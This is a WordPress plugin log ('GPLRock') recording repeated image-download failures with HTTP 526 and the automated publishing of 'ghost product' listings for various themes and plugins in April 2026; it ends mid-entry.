https://meldwp.com/wp-content/uploads/paylane-secure-form-gateway-for-woocommerce-8838.webp [02-Apr-2026 01:12:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: paylane-secure-form-gateway-for-woocommerce [02-Apr-2026 01:12:15 UTC] GPLRock: Image downloaded successfully for product youtube-plugin-wordpress-youtube-gallery (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72ec9163.webp [02-Apr-2026 01:12:15 UTC] GPLRock: Using pre-downloaded image for product youtube-plugin-wordpress-youtube-gallery: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-72ec9163.webp [02-Apr-2026 01:12:15 UTC] GPLRock: Ghost product published with image - Product ID: youtube-plugin-wordpress-youtube-gallery [02-Apr-2026 01:12:15 UTC] GPLRock: Image download failed for product mynx-wordpress-templates-library (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:15 UTC] GPLRock: Image downloaded successfully for product yith-wordpress-test-environment-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa44cd9e.jpg [02-Apr-2026 01:12:15 UTC] GPLRock: Using pre-downloaded image for product yith-wordpress-test-environment-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fa44cd9e.jpg [02-Apr-2026 01:12:15 UTC] GPLRock: Ghost product published with image - Product ID: yith-wordpress-test-environment-premium [02-Apr-2026 01:12:16 UTC] GPLRock: Image downloaded successfully for product ninja-forms-convertkit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a64840f.jpg [02-Apr-2026 01:12:16 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-convertkit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2a64840f.jpg [02-Apr-2026 01:12:16 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-convertkit [02-Apr-2026 01:12:17 UTC] GPLRock: Image download failed for product mynx-wordpress-templates-library (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:19 UTC] GPLRock: Image downloaded successfully for product petshop-storefront-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b28fe910.jpg [02-Apr-2026 01:12:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mynx--wordpress-templates-library-556.webp for product mynx-wordpress-templates-library after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:19 UTC] GPLRock: Using pre-downloaded image for product petshop-storefront-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b28fe910.jpg [02-Apr-2026 01:12:19 UTC] GPLRock: Ghost product published with image - Product ID: petshop-storefront-woocommerce-theme [02-Apr-2026 01:12:19 UTC] GPLRock: Image download failed for product mynx-wordpress-templates-library (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:21 UTC] GPLRock: Image download failed for product mynx-wordpress-templates-library (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:22 UTC] GPLRock: Image downloaded successfully for product woocommerce-simple-storewide-sale (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43de82dc.jpg [02-Apr-2026 01:12:22 UTC] GPLRock: Using pre-downloaded image for product woocommerce-simple-storewide-sale: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-43de82dc.jpg [02-Apr-2026 01:12:22 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-simple-storewide-sale [02-Apr-2026 01:12:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mynx--wordpress-templates-library-556.webp for product mynx-wordpress-templates-library after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:23 UTC] GPLRock WARNING: Image download failed for product mynx-wordpress-templates-library. URL: https://meldwp.com/wp-content/uploads/mynx--wordpress-templates-library-556.webp [02-Apr-2026 01:12:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mynx-wordpress-templates-library [02-Apr-2026 01:12:23 UTC] GPLRock: Image download failed for product valentines-day-invitations-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:26 UTC] GPLRock: Image download failed for product valentines-day-invitations-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:26 UTC] GPLRock: Image downloaded successfully for product mythemeshop-sensational-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b8ff505.jpg [02-Apr-2026 01:12:26 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-sensational-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2b8ff505.jpg [02-Apr-2026 01:12:26 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-sensational-wordpress-theme [02-Apr-2026 01:12:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valentines-day-invitations-for-elementor-31593.webp for product valentines-day-invitations-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:28 UTC] GPLRock: Image download failed for product valentines-day-invitations-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:30 UTC] GPLRock: Image download failed for product valentines-day-invitations-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/valentines-day-invitations-for-elementor-31593.webp for product valentines-day-invitations-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:32 UTC] GPLRock WARNING: Image download failed for product valentines-day-invitations-for-elementor. URL: https://meldwp.com/wp-content/uploads/valentines-day-invitations-for-elementor-31593.webp [02-Apr-2026 01:12:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: valentines-day-invitations-for-elementor [02-Apr-2026 01:12:32 UTC] GPLRock: Image download failed for product logo-showcase-responsive-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:34 UTC] GPLRock: Image download failed for product logo-showcase-responsive-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase---responsive-wordpress-plugin-21199.webp for product logo-showcase-responsive-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:36 UTC] GPLRock: Image download failed for product logo-showcase-responsive-wordpress-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:39 UTC] GPLRock: Image download failed for product logo-showcase-responsive-wordpress-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/logo-showcase---responsive-wordpress-plugin-21199.webp for product logo-showcase-responsive-wordpress-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:41 UTC] GPLRock WARNING: Image download failed for product logo-showcase-responsive-wordpress-plugin. URL: https://meldwp.com/wp-content/uploads/logo-showcase---responsive-wordpress-plugin-21199.webp [02-Apr-2026 01:12:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: logo-showcase-responsive-wordpress-plugin [02-Apr-2026 01:12:41 UTC] GPLRock: Image download failed for product menuar-navigation-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:43 UTC] GPLRock: Image download failed for product menuar-navigation-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/menuar--navigation-menu-for-elementor-29702.webp for product menuar-navigation-menu-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:45 UTC] GPLRock: Image download failed for product menuar-navigation-menu-for-elementor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:47 UTC] GPLRock: Image download failed for product menuar-navigation-menu-for-elementor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/menuar--navigation-menu-for-elementor-29702.webp for product menuar-navigation-menu-for-elementor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:49 UTC] GPLRock WARNING: Image download failed for product menuar-navigation-menu-for-elementor. URL: https://meldwp.com/wp-content/uploads/menuar--navigation-menu-for-elementor-29702.webp [02-Apr-2026 01:12:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: menuar-navigation-menu-for-elementor [02-Apr-2026 01:12:49 UTC] GPLRock: Image download failed for product custom-cursor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:52 UTC] GPLRock: Image download failed for product custom-cursor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-cursor-6432.webp for product custom-cursor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:54 UTC] GPLRock: Image download failed for product custom-cursor (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:56 UTC] GPLRock: Image download failed for product custom-cursor (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:12:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-cursor-6432.webp for product custom-cursor after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:12:58 UTC] GPLRock WARNING: Image download failed for product custom-cursor. URL: https://meldwp.com/wp-content/uploads/custom-cursor-6432.webp [02-Apr-2026 01:12:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-cursor [02-Apr-2026 01:12:58 UTC] GPLRock: Image download failed for product formina-elementor-form-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:13:00 UTC] GPLRock: Image download failed for product formina-elementor-form-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:13:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/formina-elementor-form-addon-32861.webp for product formina-elementor-form-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:13:02 UTC] GPLRock: Image download failed for product formina-elementor-form-addon (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:13:04 UTC] GPLRock: Image download failed for product formina-elementor-form-addon (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 01:13:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/formina-elementor-form-addon-32861.webp for product formina-elementor-form-addon after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 01:13:07 UTC] GPLRock WARNING: Image download failed for product formina-elementor-form-addon. URL: https://meldwp.com/wp-content/uploads/formina-elementor-form-addon-32861.webp [02-Apr-2026 01:13:07 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: formina-elementor-form-addon [02-Apr-2026 09:46:54 UTC] GPLRock: Image download failed for product rabbit-elementor-coming-soon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:46:56 UTC] GPLRock: Image download failed for product master-whatsapp-chat-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:46:56 UTC] GPLRock: Image download failed for product rabbit-elementor-coming-soon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:46:58 UTC] GPLRock: Image download failed for product master-whatsapp-chat-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:46:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rabbit---elementor-coming-soon-wordpress-theme-7286.webp for product rabbit-elementor-coming-soon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:46:58 UTC] GPLRock: Image download failed for product rabbit-elementor-coming-soon-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/master-whatsapp-chat-for-wordpress-33093.webp for product master-whatsapp-chat-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:00 UTC] GPLRock: Image download failed for product master-whatsapp-chat-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:01 UTC] GPLRock: Image download failed for product rabbit-elementor-coming-soon-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:03 UTC] GPLRock: Image download failed for product master-whatsapp-chat-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/rabbit---elementor-coming-soon-wordpress-theme-7286.webp for product rabbit-elementor-coming-soon-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:03 UTC] GPLRock WARNING: Image download failed for product rabbit-elementor-coming-soon-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/rabbit---elementor-coming-soon-wordpress-theme-7286.webp [02-Apr-2026 09:47:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: rabbit-elementor-coming-soon-wordpress-theme [02-Apr-2026 09:47:03 UTC] GPLRock: Image download failed for product maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/master-whatsapp-chat-for-wordpress-33093.webp for product master-whatsapp-chat-for-wordpress after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:05 UTC] GPLRock WARNING: Image download failed for product master-whatsapp-chat-for-wordpress. URL: https://meldwp.com/wp-content/uploads/master-whatsapp-chat-for-wordpress-33093.webp [02-Apr-2026 09:47:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: master-whatsapp-chat-for-wordpress [02-Apr-2026 09:47:05 UTC] GPLRock: Image download failed for product apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:05 UTC] GPLRock: Image download failed for product maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:07 UTC] GPLRock: Image download failed for product apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxshop---electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2--1892.webp for product maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:07 UTC] GPLRock: Image download failed for product maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apollo---sticky-full-width-html5-audio-player-for-wpbakery-page-builder-27026.webp for product apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:09 UTC] GPLRock: Image download failed for product apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:09 UTC] GPLRock: Image download failed for product maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:11 UTC] GPLRock: Image download failed for product apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/maxshop---electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2--1892.webp for product maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:11 UTC] GPLRock WARNING: Image download failed for product maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts. URL: https://meldwp.com/wp-content/uploads/maxshop---electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2--1892.webp [02-Apr-2026 09:47:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: maxshop-electronics-store-elementor-woocommerce-wordpress-theme-9-homepages-2-mobile-layouts [02-Apr-2026 09:47:11 UTC] GPLRock: Image download failed for product cosgrove-medical-healthcare-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/apollo---sticky-full-width-html5-audio-player-for-wpbakery-page-builder-27026.webp for product apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:13 UTC] GPLRock WARNING: Image download failed for product apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder. URL: https://meldwp.com/wp-content/uploads/apollo---sticky-full-width-html5-audio-player-for-wpbakery-page-builder-27026.webp [02-Apr-2026 09:47:13 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: apollo-sticky-full-width-html5-audio-player-for-wpbakery-page-builder [02-Apr-2026 09:47:13 UTC] GPLRock: Image download failed for product touch-n-swipe-gallery-jquery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:14 UTC] GPLRock: Image download failed for product cosgrove-medical-healthcare-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:16 UTC] GPLRock: Image download failed for product touch-n-swipe-gallery-jquery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosgrove---medical--healthcare-wordpress-theme-27066.webp for product cosgrove-medical-healthcare-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:16 UTC] GPLRock: Image download failed for product cosgrove-medical-healthcare-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/touch-n-swipe-gallery-jquery-plugin-25934.webp for product touch-n-swipe-gallery-jquery-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:18 UTC] GPLRock: Image download failed for product touch-n-swipe-gallery-jquery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:18 UTC] GPLRock: Image download failed for product cosgrove-medical-healthcare-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:20 UTC] GPLRock: Image download failed for product touch-n-swipe-gallery-jquery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cosgrove---medical--healthcare-wordpress-theme-27066.webp for product cosgrove-medical-healthcare-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:20 UTC] GPLRock WARNING: Image download failed for product cosgrove-medical-healthcare-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/cosgrove---medical--healthcare-wordpress-theme-27066.webp [02-Apr-2026 09:47:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cosgrove-medical-healthcare-wordpress-theme [02-Apr-2026 09:47:20 UTC] GPLRock: Image download failed for product picko-clean-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/touch-n-swipe-gallery-jquery-plugin-25934.webp for product touch-n-swipe-gallery-jquery-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:22 UTC] GPLRock WARNING: Image download failed for product touch-n-swipe-gallery-jquery-plugin. URL: https://meldwp.com/wp-content/uploads/touch-n-swipe-gallery-jquery-plugin-25934.webp [02-Apr-2026 09:47:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: touch-n-swipe-gallery-jquery-plugin [02-Apr-2026 09:47:22 UTC] GPLRock: Image download failed for product woocommerce-product-list-advanced (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:22 UTC] GPLRock: Image download failed for product picko-clean-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:24 UTC] GPLRock: Image download failed for product woocommerce-product-list-advanced (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/picko---clean-portfolio-wordpress-theme-4266.webp for product picko-clean-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:24 UTC] GPLRock: Image download failed for product picko-clean-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-list-advanced-3430.webp for product woocommerce-product-list-advanced after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:26 UTC] GPLRock: Image download failed for product woocommerce-product-list-advanced (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:27 UTC] GPLRock: Image download failed for product picko-clean-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:28 UTC] GPLRock: Image download failed for product woocommerce-product-list-advanced (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/picko---clean-portfolio-wordpress-theme-4266.webp for product picko-clean-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:29 UTC] GPLRock WARNING: Image download failed for product picko-clean-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/picko---clean-portfolio-wordpress-theme-4266.webp [02-Apr-2026 09:47:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: picko-clean-portfolio-wordpress-theme [02-Apr-2026 09:47:29 UTC] GPLRock: Image downloaded successfully for product dreamspos-pos-inventory-management-admin-dashboard-html-angular-19-react-19-vue-laravel-12 (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d6c6977.webp [02-Apr-2026 09:47:29 UTC] GPLRock: Using pre-downloaded image for product dreamspos-pos-inventory-management-admin-dashboard-html-angular-19-react-19-vue-laravel-12: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1d6c6977.webp [02-Apr-2026 09:47:29 UTC] GPLRock: Ghost product published with image - Product ID: dreamspos-pos-inventory-management-admin-dashboard-html-angular-19-react-19-vue-laravel-12 [02-Apr-2026 09:47:29 UTC] GPLRock: Image download failed for product monalisa-hotel-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/woocommerce-product-list-advanced-3430.webp for product woocommerce-product-list-advanced after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:31 UTC] GPLRock WARNING: Image download failed for product woocommerce-product-list-advanced. URL: https://meldwp.com/wp-content/uploads/woocommerce-product-list-advanced-3430.webp [02-Apr-2026 09:47:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: woocommerce-product-list-advanced [02-Apr-2026 09:47:31 UTC] GPLRock: Image download failed for product nikanticket-wordpress-woocommerce-support-tickets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:31 UTC] GPLRock: Image download failed for product monalisa-hotel-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:33 UTC] GPLRock: Image download failed for product nikanticket-wordpress-woocommerce-support-tickets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monalisa--hotel--resort-wordpress-theme-30221.webp for product monalisa-hotel-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:33 UTC] GPLRock: Image download failed for product monalisa-hotel-resort-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nikanticket---wordpress--woocommerce-support-tickets-17314.webp for product nikanticket-wordpress-woocommerce-support-tickets after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:35 UTC] GPLRock: Image download failed for product nikanticket-wordpress-woocommerce-support-tickets (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:35 UTC] GPLRock: Image download failed for product monalisa-hotel-resort-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:37 UTC] GPLRock: Image download failed for product nikanticket-wordpress-woocommerce-support-tickets (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monalisa--hotel--resort-wordpress-theme-30221.webp for product monalisa-hotel-resort-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:37 UTC] GPLRock WARNING: Image download failed for product monalisa-hotel-resort-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/monalisa--hotel--resort-wordpress-theme-30221.webp [02-Apr-2026 09:47:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: monalisa-hotel-resort-wordpress-theme [02-Apr-2026 09:47:38 UTC] GPLRock: Image download failed for product alices-lingerie-store-and-fashion-boutique-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nikanticket---wordpress--woocommerce-support-tickets-17314.webp for product nikanticket-wordpress-woocommerce-support-tickets after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:39 UTC] GPLRock WARNING: Image download failed for product nikanticket-wordpress-woocommerce-support-tickets. URL: https://meldwp.com/wp-content/uploads/nikanticket---wordpress--woocommerce-support-tickets-17314.webp [02-Apr-2026 09:47:39 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nikanticket-wordpress-woocommerce-support-tickets [02-Apr-2026 09:47:39 UTC] GPLRock: Image download failed for product accordionza-jquery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:40 UTC] GPLRock: Image download failed for product alices-lingerie-store-and-fashion-boutique-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:41 UTC] GPLRock: Image download failed for product accordionza-jquery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alices--lingerie-store-and-fashion-boutique-wordpress-theme-26516.webp for product alices-lingerie-store-and-fashion-boutique-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:42 UTC] GPLRock: Image download failed for product alices-lingerie-store-and-fashion-boutique-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/accordionza---jquery-plugin-3926.webp for product accordionza-jquery-plugin after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:44 UTC] GPLRock: Image download failed for product accordionza-jquery-plugin (attempt 1/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:44 UTC] GPLRock: Image download failed for product alices-lingerie-store-and-fashion-boutique-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:46 UTC] GPLRock: Image download failed for product accordionza-jquery-plugin (attempt 2/3). HTTP Code: 526, Error: . Retrying... [02-Apr-2026 09:47:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/alices--lingerie-store-and-fashion-boutique-wordpress-theme-26516.webp for product alices-lingerie-store-and-fashion-boutique-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [02-Apr-2026 09:47:46 UTC] GPLRock WARNING: Image download failed for product alices-lingerie-store-and-fashion-boutique-wordpress-theme. URL: 